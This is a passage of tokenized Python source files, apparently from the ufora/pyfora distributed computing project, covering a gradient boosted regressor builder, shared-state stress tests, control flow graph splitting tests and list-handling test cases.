<s> import losses <EOL> import Base <EOL> import RegressionModel <EOL> class IterativeFitter : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , predictions ) : <EOL> self . model = model <EOL> self . predictions = predictions <EOL> def next ( self ) : <EOL> """<STR_LIT>""" <EOL> pseudoResiduals , newPredictions = self . model . pseudoResidualsAndPredictions ( self . predictions ) <EOL> newModel = self . model . boost ( newPredictions , pseudoResiduals ) <EOL> return IterativeFitter ( newModel , newPredictions ) <EOL> def predictionsAndPseudoresiduals ( self ) : <EOL> return self . model . pseudoResidualsAndPredictions ( <EOL> self . predictions <EOL> ) <EOL> class GradientBoostedRegressorBuilder : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , maxDepth = <NUM_LIT:3> , nBoosts = <NUM_LIT:100> , learningRate = <NUM_LIT:1.0> , <EOL> minSamplesSplit = <NUM_LIT:2> , numBuckets = <NUM_LIT> , loss = "<STR_LIT>" ) : <EOL> if loss == '<STR_LIT>' : <EOL> loss = losses . L2_loss ( ) <EOL> elif loss == '<STR_LIT>' : <EOL> loss = losses . Absoluteloss ( ) <EOL> else : <EOL> assert False , "<STR_LIT>" + str ( loss ) <EOL> treeBuilderArgs = Base . TreeBuilderArgs ( <EOL> minSamplesSplit , maxDepth , numBuckets <EOL> ) <EOL> self . loss = loss <EOL> self . nBoostingIterations = nBoosts <EOL> self . learningRate = learningRate <EOL> self . treeBuilderArgs = treeBuilderArgs <EOL> def iterativeFitter ( self , X , y ) : <EOL> """<STR_LIT>""" <EOL> yAsSeries = y . iloc [ : , <NUM_LIT:0> ] <EOL> model = self . _getInitialModel ( X , yAsSeries ) <EOL> return IterativeFitter ( model , None ) <EOL> def _getInitialModel ( self , X , yAsSeries ) : <EOL> return RegressionModel . RegressionModel . getInitialModel ( <EOL> X , yAsSeries , self . loss , self . learningRate , self . treeBuilderArgs <EOL> ) <EOL> def fit ( self , X , y ) : <EOL> """<STR_LIT>""" <EOL> iterativeFitter = self . iterativeFitter ( X , y ) <EOL> boostingIx = <NUM_LIT:0> <EOL> while boostingIx < self . nBoostingIterations : <EOL> iterativeFitter = iterativeFitter . next ( ) <EOL> boostingIx = boostingIx + <NUM_LIT:1> <EOL> return iterativeFitter . model </s>
<s> def d_func ( x ) : <EOL> return x + <NUM_LIT:1> </s>
<s> import unittest <EOL> import logging <EOL> import random <EOL> import ufora . util . ManagedThread as ManagedThread <EOL> import uuid <EOL> import ufora . config . Setup as Setup <EOL> import ufora . native . Json as NativeJson <EOL> import ufora . test . ClusterSimulation as ClusterSimulation <EOL> import ufora . test . CumulusSimulationUtils as CumulusSimulationUtils <EOL> import ufora . distributed . SharedState . Connections . ViewFactory as ViewFactory <EOL> import ufora . distributed . SharedState . SharedState as SharedState <EOL> import ufora . native . CallbackScheduler as CallbackScheduler <EOL> callbackScheduler = CallbackScheduler . singletonForTesting ( ) <EOL> class SharedStateRelayTests ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . simulator = ClusterSimulation . Simulator . createGlobalSimulator ( ) <EOL> cls . simulator . startService ( ) <EOL> cls . simulator . verifySharedStateRunning ( ) <EOL> cls . desirePublisher = cls . simulator . desirePublisher <EOL> def stressMultipleSharedStateReadWrites ( self , useTcpFactory = False , keysToWrite = <NUM_LIT:20> , threadcount = <NUM_LIT:10> ) : <EOL> keyspaceSize = keysToWrite * <NUM_LIT:5> <EOL> subPasses = <NUM_LIT:10> <EOL> if useTcpFactory : <EOL> viewFactory = ViewFactory . ViewFactory . TcpViewFactory ( callbackScheduler , address = "<STR_LIT:localhost>" ) <EOL> else : <EOL> viewFactory = self . simulator . getViewFactory ( ) <EOL> worked = { } <EOL> for ix in range ( threadcount ) : <EOL> worked [ ix ] = False <EOL> def test ( threadIx ) : <EOL> for subPassIx in range ( subPasses ) : <EOL> logging . info ( "<STR_LIT>" , threadIx , subPassIx ) <EOL> testKeyspace = SharedState . Keyspace ( "<STR_LIT>" , NativeJson . Json ( "<STR_LIT>" ) , <NUM_LIT:1> ) <EOL> view = viewFactory . createView ( ) <EOL> rng = SharedState . KeyRange ( testKeyspace , <NUM_LIT:0> , None , None , True , False ) <EOL> view . subscribe ( rng ) <EOL> for ix in range ( keysToWrite ) : <EOL> with SharedState . Transaction ( view ) : <EOL> ix = random . randint ( <NUM_LIT:0> , keyspaceSize ) <EOL> key = SharedState . Key ( testKeyspace , ( NativeJson . Json ( "<STR_LIT>" % ix ) , ) ) <EOL> value = uuid . uuid4 ( ) . hex <EOL> view [ key ] = NativeJson . Json ( value ) <EOL> worked [ threadIx ] = True <EOL> threads = [ ManagedThread . ManagedThread ( target = test , args = ( ix , ) ) for ix in range ( threadcount ) ] <EOL> for t in threads : <EOL> t . start ( ) <EOL> for t in threads : <EOL> t . join ( ) <EOL> expectedDict = { } <EOL> for ix in range ( threadcount ) : <EOL> expectedDict [ ix ] = True <EOL> self . assertEqual ( expectedDict , worked ) <EOL> def testWithTcp ( self ) : <EOL> self . stressMultipleSharedStateReadWrites ( True , <NUM_LIT:200> ) <EOL> def testWithRelay ( self ) : <EOL> self . stressMultipleSharedStateReadWrites ( False , <NUM_LIT:200> ) <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> cls . simulator . stopService ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import ufora . config . Mainline as Mainline <EOL> import ufora . config . LoginConfiguration as LoginConfiguration <EOL> Mainline . UnitTestMainline ( <EOL> loginConfiguration = LoginConfiguration . LoginConfiguration ( "<STR_LIT>" , "<STR_LIT>" , True , { } ) <EOL> ) </s>
<s> import unittest <EOL> import logging <EOL> import ufora . BackendGateway . ComputedGraph . ComputedGraph as ComputedGraph <EOL> import ufora . BackendGateway . ComputedValue . ComputedValueGateway as ComputedValueGateway <EOL> import ufora . BackendGateway . ComputedValue . ComputedValueTestCases as ComputedValueTestCases <EOL> import ufora . cumulus . distributed . CumulusGatewayInProcess as CumulusGatewayInProcess <EOL> import ufora . native . CallbackScheduler as CallbackScheduler <EOL> callbackScheduler = CallbackScheduler . singletonForTesting ( ) <EOL> callbackSchedulerFactory = callbackScheduler . getFactory ( ) <EOL> class TestComputedValue ( unittest . TestCase , ComputedValueTestCases . ComputedValueTestCases ) : <EOL> def setUp ( self ) : <EOL> self . graph = None <EOL> self . computedValueGateway = None <EOL> setUpComputedValueTest ( self ) <EOL> def tearDown ( self ) : <EOL> tearDownComputedValueTest ( self ) <EOL> def setUpComputedValueTest ( tester ) : <EOL> tester . graph = ComputedGraph . ComputedGraph ( ) <EOL> tester . graph . __enter__ ( ) <EOL> def gatewayFactory ( callbackScheduler , vdm ) : <EOL> return CumulusGatewayInProcess . InProcessGateway ( callbackSchedulerFactory , callbackScheduler , vdm ) <EOL> tester . computedValueGateway = ComputedValueGateway . CumulusComputedValueGateway ( <EOL> callbackSchedulerFactory , <EOL> callbackScheduler , <EOL> gatewayFactory <EOL> ) <EOL> tester . computedValueGateway . __enter__ ( ) <EOL> def tearDownComputedValueTest ( tester ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> tester . computedValueGateway . __exit__ ( None , None , None ) <EOL> tester . graph . __exit__ ( None , None , None ) <EOL> tester . computedValueGateway . teardown ( ) <EOL> tester . computedValueGateway = None <EOL> tester . graph = None <EOL> logging . info ( "<STR_LIT>" ) </s>
<s> import unittest <EOL> import logging <EOL> import ufora . native . FORA as ForaNative <EOL> import ufora . FORA . python . ExecutionContext as ExecutionContext <EOL> import ufora . FORA . python . FORA as FORA <EOL> import ufora . native . CallbackScheduler as CallbackScheduler <EOL> callbackScheduler = CallbackScheduler . singletonForTesting ( ) <EOL> callbackSchedulerFactory = callbackScheduler . getFactory ( ) <EOL> emptyCodeDefinitionPoint = ForaNative . CodeDefinitionPoint . ExternalFromStringList ( [ ] ) <EOL> class NotInterruptedException ( Exception ) : <EOL> def __init__ ( self , context ) : <EOL> self . context = context <EOL> def __repr__ ( self ) : <EOL> return repr ( self . context ) <EOL> class NotAResultException ( Exception ) : <EOL> def __init__ ( self , x ) : <EOL> self . val = x <EOL> def __repr__ ( self ) : <EOL> return repr ( self . val ) <EOL> class CouldntFinishException ( Exception ) : <EOL> def __init__ ( self , x ) : <EOL> self . val = x <EOL> def __repr__ ( self ) : <EOL> return repr ( self . val ) <EOL> def finishPausedComputation ( pausedComputation ) : <EOL> vdm = ForaNative . VectorDataManager ( callbackScheduler , <NUM_LIT:50> * <NUM_LIT> * <NUM_LIT> ) <EOL> context2 = ExecutionContext . ExecutionContext ( <EOL> dataManager = vdm , <EOL> allowInterpreterTracing = False <EOL> ) <EOL> context2 . resumePausedComputation ( pausedComputation ) <EOL> context2 . resume ( ) <EOL> if ( not context2 . isFinished ( ) ) : <EOL> raise CouldntFinishException ( pausedComputation ) <EOL> finishedResult = context2 . getFinishedResult ( ) <EOL> if ( finishedResult . isResult ( ) ) : <EOL> return finishedResult . asResult . result <EOL> elif ( finishedResult . isException ( ) ) : <EOL> return finishedResult . asException . exception <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def callAndGetResult ( funImplVal ) : <EOL> vdm = ForaNative . VectorDataManager ( callbackScheduler , <NUM_LIT:50> * <NUM_LIT> * <NUM_LIT> ) <EOL> context = ExecutionContext . ExecutionContext ( <EOL> dataManager = vdm , <EOL> allowInterpreterTracing = False <EOL> ) <EOL> context . evaluate ( funImplVal , ForaNative . symbol_Call ) <EOL> finishedResult = context . getFinishedResult ( ) <EOL> if ( not finishedResult . isResult ( ) ) : <EOL> raise NotAResultException ( finishedResult ) <EOL> return finishedResult . asResult . result <EOL> def callAndExtractPausedCompuationAfterSteps ( funToCall , steps ) : <EOL> vdm = ForaNative . VectorDataManager ( callbackScheduler , <NUM_LIT:50> * <NUM_LIT> * <NUM_LIT> ) <EOL> context = ExecutionContext . ExecutionContext ( <EOL> dataManager = vdm , <EOL> allowInterpreterTracing = False <EOL> ) <EOL> context . interruptAfterCycleCount ( steps ) <EOL> context . evaluate ( <EOL> funToCall , <EOL> ForaNative . symbol_Call <EOL> ) <EOL> if ( not context . isInterrupted ( ) ) : <EOL> raise NotInterruptedException ( context ) <EOL> computation = context . extractPausedComputation ( ) <EOL> context . teardown ( ) <EOL> return computation <EOL> class ControlFlowGraphSplitterTest ( unittest . TestCase ) : <EOL> def parseStringToFunction ( self , expr ) : <EOL> expression = ForaNative . parseStringToExpression ( expr , emptyCodeDefinitionPoint , "<STR_LIT>" ) <EOL> return expression . extractRootLevelCreateFunctionPredicate ( ) <EOL> def test_cfgSplitting_1 ( self ) : <EOL> cfg1 = self . parseStringToFunction ( "<STR_LIT>" ) . toCFG ( <NUM_LIT:1> ) <EOL> steps = ForaNative . extractApplyStepsFromControlFlowGraph ( cfg1 , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( steps ) , <NUM_LIT:4> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg1 , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_2 ( self ) : <EOL> cfg1 = self . parseStringToFunction ( "<STR_LIT>" ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg1 , None ) <EOL> self . assertTrue ( splits is None ) <EOL> def test_cfgSplitting_3 ( self ) : <EOL> cfg1 = self . parseStringToFunction ( "<STR_LIT>" ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg1 , None ) <EOL> self . assertTrue ( splits is None ) <EOL> def test_cfgSplitting_4 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> steps = ForaNative . extractApplyStepsFromControlFlowGraph ( cfg , None ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_5 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> steps = ForaNative . extractApplyStepsFromControlFlowGraph ( cfg , None ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_6 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_7 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_8 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_9 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_10 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_11 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_12 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is None ) <EOL> def test_cfgSplitting_13 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cfgSplitting_14 ( self ) : <EOL> funString = "<STR_LIT>" <EOL> cfg = self . parseStringToFunction ( funString ) . toCFG ( <NUM_LIT:1> ) <EOL> splits = ForaNative . splitControlFlowGraph ( cfg , "<STR_LIT>" ) <EOL> self . assertTrue ( splits is not None ) <EOL> def test_cannotSplitThingsWithMutables ( self ) : <EOL> text = """<STR_LIT>""" <EOL> funImplval = FORA . extractImplValContainer ( FORA . eval ( text ) ) <EOL> i = <NUM_LIT:0> <EOL> while ( i < <NUM_LIT> ) : <EOL> i += <NUM_LIT:1000> <EOL> try : <EOL> pausedComputation = callAndExtractPausedCompuationAfterSteps ( funImplval , i ) <EOL> except NotInterruptedException as e : <EOL> break <EOL> allAreCST = True <EOL> for val in pausedComputation . frames [ <NUM_LIT:0> ] . values : <EOL> if not val . isCST ( ) : <EOL> allAreCST = False <EOL> break <EOL> if not allAreCST : <EOL> splitComputation = ForaNative . splitPausedComputation ( pausedComputation ) <EOL> self . assertTrue ( not splitComputation , splitComputation ) <EOL> def test_splitComputation_1 ( self ) : <EOL> text = """<STR_LIT>""" <EOL> funImplval = FORA . extractImplValContainer ( FORA . eval ( text ) ) <EOL> pausedComputation = callAndExtractPausedCompuationAfterSteps ( funImplval , <NUM_LIT> ) <EOL> splitComputation = ForaNative . splitPausedComputation ( pausedComputation ) <EOL> self . assertTrue ( splitComputation is not None ) <EOL> def test_splitComputation_2 ( self ) : <EOL> text = """<STR_LIT>""" <EOL> funImplval = FORA . extractImplValContainer ( FORA . eval ( text ) ) <EOL> pausedComputation = callAndExtractPausedCompuationAfterSteps ( funImplval , <NUM_LIT> ) <EOL> splitComputation = ForaNative . splitPausedComputation ( pausedComputation ) <EOL> self . assertIsNotNone ( splitComputation ) <EOL> unsplitValue = finishPausedComputation ( pausedComputation ) <EOL> applyComputationVal = finishPausedComputation ( splitComputation . applyComputation ) <EOL> splitComputationVal = finishPausedComputation ( splitComputation . splitComputation ) <EOL> resumedComputation = ForaNative . joinSplitPausedComputation ( <EOL> splitComputation , <EOL> applyComputationVal , <EOL> splitComputationVal <EOL> ) <EOL> finalSplitVal = finishPausedComputation ( resumedComputation ) <EOL> self . assertEqual ( unsplitValue , finalSplitVal ) <EOL> def randomSplitComputationTest ( self , text ) : <EOL> if ( isinstance ( text , str ) ) : <EOL> funImplVal = FORA . extractImplValContainer ( FORA . eval ( text ) ) <EOL> else : <EOL> funImplVal = text <EOL> unsplitVal = callAndGetResult ( funImplVal ) <EOL> splitAtLeastOne = False <EOL> i = <NUM_LIT:0> <EOL> while ( i < <NUM_LIT> ) : <EOL> i += <NUM_LIT:1> <EOL> try : <EOL> pausedComputation = callAndExtractPausedCompuationAfterSteps ( funImplVal , i ) <EOL> except NotInterruptedException as e : <EOL> break <EOL> splitComputation = ForaNative . splitPausedComputation ( pausedComputation ) <EOL> unsplitVal2 = finishPausedComputation ( pausedComputation ) <EOL> self . assertEqual ( unsplitVal , unsplitVal2 ) <EOL> if ( splitComputation ) : <EOL> splitAtLeastOne = True <EOL> applyComputationVal = finishPausedComputation ( splitComputation . applyComputation ) <EOL> splitComputationVal = finishPausedComputation ( splitComputation . splitComputation ) <EOL> resumedComputation = ForaNative . joinSplitPausedComputation ( <EOL> splitComputation , <EOL> applyComputationVal , <EOL> splitComputationVal <EOL> ) <EOL> finalSplitVal = finishPausedComputation ( resumedComputation ) <EOL> self . assertEqual ( unsplitVal , finalSplitVal ) <EOL> if ( not splitAtLeastOne ) : <EOL> logging . warn ( "<STR_LIT>" % ( text , i ) ) <EOL> def disabled_randomSplitting_1 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) <EOL> def test_randomSplitting_2 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) <EOL> def test_randomSplitting_3 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) <EOL> def test_randomSplitting_4 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) <EOL> def test_randomSplitting_5 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) <EOL> def test_randomSplitting_6 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) <EOL> def test_randomSplitting_7 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) <EOL> def test_randomSplitting_8 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) <EOL> def test_randomSplitting_9 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) <EOL> def test_randomSplitting_10 ( self ) : <EOL> funString = """<STR_LIT>""" <EOL> self . randomSplitComputationTest ( funString ) </s>
<s> import ufora . config . Setup as Setup <EOL> _evaluator = None <EOL> def evaluator ( ) : <EOL> global _evaluator <EOL> if _evaluator is None : <EOL> assert False , "<STR_LIT>" <EOL> return _evaluator <EOL> def swapEvaluator ( newEvaluator ) : <EOL> """<STR_LIT>""" <EOL> global _evaluator <EOL> oldEval = _evaluator <EOL> _evaluator = newEvaluator <EOL> return oldEval <EOL> def initialize ( setupObjectToUse = None , useLocalEvaluator = True , vdmOverride = None ) : <EOL> global _evaluator <EOL> if _evaluator is not None : <EOL> return <EOL> import ufora . FORA . python . Evaluator . LocalEvaluator as LocalEvaluator <EOL> import ufora . FORA . python . Evaluator . CumulusEvaluator as CumulusEvaluator <EOL> if setupObjectToUse is None : <EOL> configToUse = Setup . config ( ) <EOL> else : <EOL> configToUse = setupObjectToUse . config <EOL> if useLocalEvaluator : <EOL> _evaluator = LocalEvaluator . defaultLocalEvaluator ( vdmOverride = vdmOverride ) <EOL> else : <EOL> import ufora . native . CallbackScheduler as CallbackSchedulerNative <EOL> schedulerFactory = CallbackSchedulerNative . createSimpleCallbackSchedulerFactory ( ) <EOL> _evaluator = CumulusEvaluator . CumulusEvaluator ( <EOL> schedulerFactory . createScheduler ( "<STR_LIT>" , <NUM_LIT:1> ) <EOL> ) <EOL> def isInitialized ( ) : <EOL> global _evaluator <EOL> return _evaluator is not None </s>
<s> import time <EOL> import numpy <EOL> import pyfora . Exceptions as Exceptions <EOL> class ListTestCases ( object ) : <EOL> """<STR_LIT>""" <EOL> def test_handle_empty_list ( self ) : <EOL> def f ( ) : <EOL> return [ ] <EOL> self . equivalentEvaluationTest ( f ) <EOL> def test_list_str ( self ) : <EOL> t1 = ( <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> self . equivalentEvaluationTest ( <EOL> lambda : str ( t1 ) <EOL> ) <EOL> def test_return_list ( self ) : <EOL> def f ( ) : <EOL> return [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> self . equivalentEvaluationTest ( f ) <EOL> def test_list_in_loop ( self ) : <EOL> def f ( ct ) : <EOL> ix = <NUM_LIT:0> <EOL> l = [ ] <EOL> while ix < ct : <EOL> l = l + [ ix ] <EOL> ix = ix + <NUM_LIT:1> <EOL> res = <NUM_LIT:0> <EOL> for e in l : <EOL> res = res + e <EOL> return res <EOL> ct = <NUM_LIT> <EOL> res = self . evaluateWithExecutor ( f , ct ) <EOL> self . assertEqual ( res , ct * ( ct - <NUM_LIT:1> ) / <NUM_LIT:2> ) <EOL> def test_list_getitem_1 ( self ) : <EOL> def f ( ) : <EOL> l = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> return l [ <NUM_LIT:0> ] <EOL> self . equivalentEvaluationTest ( f ) <EOL> def test_list_getitem_2 ( self ) : <EOL> v = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> def f ( ix ) : <EOL> return v [ ix ] <EOL> for ix in range ( - <NUM_LIT:3> , <NUM_LIT:3> ) : <EOL> self . equivalentEvaluationTest ( f , ix ) <EOL> def test_list_getitem_3 ( self ) : <EOL> def nestedLists ( ) : <EOL> x = [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , [ <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] ] <EOL> return x [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . equivalentEvaluationTest ( nestedLists ) <EOL> def test_list_len ( self ) : <EOL> def f ( ) : <EOL> l = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> return ( len ( l ) , len ( l ) == <NUM_LIT:3> , len ( l ) is <NUM_LIT:3> ) <EOL> self . equivalentEvaluationTest ( f ) <EOL> def test_long_list ( self ) : <EOL> t0 = time . time ( ) <EOL> l = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] * <NUM_LIT> <EOL> def f ( x ) : <EOL> return len ( x ) <EOL> self . equivalentEvaluationTest ( f , l ) <EOL> print "<STR_LIT>" , time . time ( ) - t0 , "<STR_LIT>" <EOL> def test_lists_3 ( self ) : <EOL> def f ( elt ) : <EOL> x = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> return x . index ( elt ) <EOL> for ix in range ( <NUM_LIT:1> , <NUM_LIT:4> ) : <EOL> self . equivalentEvaluationTest ( f , ix ) <EOL> def test_lists_6 ( self ) : <EOL> v = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> def f ( val ) : <EOL> return v . index ( val ) <EOL> for ix in range ( <NUM_LIT:1> , <NUM_LIT:4> ) : <EOL> self . equivalentEvaluationTest ( f , ix ) <EOL> def test_list_bound_methods_know_they_are_pyfora ( self ) : <EOL> def testFun ( ) : <EOL> return [ ] . __add__ . __is_pyfora__ <EOL> self . assertTrue ( self . evaluateWithExecutor ( testFun ) ) <EOL> def test_listComprehensions_1 ( self ) : <EOL> def listComprehensions_1 ( ) : <EOL> aList = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> aList = [ elt * <NUM_LIT:2> for elt in aList ] <EOL> return aList [ - <NUM_LIT:1> ] <EOL> self . equivalentEvaluationTest ( listComprehensions_1 ) <EOL> def test_listComprehensions_2 ( self ) : <EOL> def listComprehensions_2 ( arg ) : <EOL> aList = range ( <NUM_LIT:4> ) <EOL> filteredList = [ elt for elt in aList if elt % <NUM_LIT:2> == <NUM_LIT:0> ] <EOL> return filteredList [ arg ] <EOL> for ix in range ( - <NUM_LIT:2> , <NUM_LIT:2> ) : <EOL> self . equivalentEvaluationTest ( listComprehensions_2 , ix ) <EOL> def test_listComprehensions_3 ( self ) : <EOL> def listComprehensions_3 ( ) : <EOL> aList = [ ( x , y ) for x in [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] for y in [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:4> ] ] <EOL> return aList [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> self . equivalentEvaluationTest ( listComprehensions_3 ) <EOL> def test_listComprehensions_4 ( self ) : <EOL> def listComprehensions_4 ( arg ) : <EOL> aList = [ ( x , y ) for x in [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] for y in [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:4> ] if x != y ] <EOL> return aList [ arg ] <EOL> for ix in range ( - <NUM_LIT:7> , <NUM_LIT:7> ) : <EOL> self . equivalentEvaluationTest ( listComprehensions_4 , ix ) <EOL> def test_basicLists_1 ( self ) : <EOL> def basicLists ( x ) : <EOL> aList = [ x ] + [ x ] <EOL> return aList [ <NUM_LIT:0> ] + aList [ <NUM_LIT:1> ] <EOL> self . equivalentEvaluationTest ( basicLists , <NUM_LIT:1> ) <EOL> def test_lists_1 ( self ) : <EOL> x = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> def f ( ix ) : <EOL> return x [ ix ] <EOL> for ix in range ( - len ( x ) , len ( x ) ) : <EOL> self . equivalentEvaluationTest ( f , ix ) <EOL> def test_lists_2 ( self ) : <EOL> class C_lists : <EOL> def __init__ ( self , x ) : <EOL> self . x = x <EOL> def __eq__ ( self , other ) : <EOL> return self . x == other . x <EOL> xs = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , C_lists ( <NUM_LIT:3> ) ] <EOL> def elt ( ix ) : <EOL> return xs [ ix ] <EOL> for ix in range ( - <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> self . equivalentEvaluationTest ( elt , ix ) <EOL> def test_listComprehensions_5 ( self ) : <EOL> def listComprehensions_3 ( arg ) : <EOL> aList = [ ( x , y ) for x in [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] for y in [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:4> ] ] <EOL> return aList [ arg ] <EOL> for ix in range ( - <NUM_LIT:9> , <NUM_LIT:9> ) : <EOL> self . equivalentEvaluationTest ( listComprehensions_3 , ix ) <EOL> def test_listComprehensions_6 ( self ) : <EOL> def listComprehensions_1 ( arg ) : <EOL> aList = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> aList = [ elt * <NUM_LIT:2> for elt in aList ] <EOL> return aList [ arg ] <EOL> for ix in range ( - <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> self . equivalentEvaluationTest ( listComprehensions_1 , ix ) <EOL> def test_nestedComprehensions_2 ( self ) : <EOL> def nestedComprehensions ( ) : <EOL> x = [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] , [ <NUM_LIT:5> , <NUM_LIT:6> ] ] <EOL> res = [ [ row [ ix ] for row in x ] for ix in [ <NUM_LIT:0> , <NUM_LIT:1> ] ] <EOL> return res [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . equivalentEvaluationTest ( nestedComprehensions ) <EOL> def test_nestedLists_1 ( self ) : <EOL> def nestedLists ( ) : <EOL> x = [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , [ <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] ] <EOL> return x [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . equivalentEvaluationTest ( nestedLists ) <EOL> def test_list_containing_itself ( self ) : <EOL> evilList = [ ] <EOL> evilList . append ( evilList ) <EOL> try : <EOL> self . equivalentEvaluationTest ( lambda : len ( evilList ) ) <EOL> self . assertTrue ( False ) <EOL> except Exceptions . PythonToForaConversionError as e : <EOL> self . assertIsInstance ( e . message , str ) <EOL> self . assertEqual ( <EOL> e . message , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_nestedComprehensions_1 ( self ) : <EOL> def nestedComprehensions ( ) : 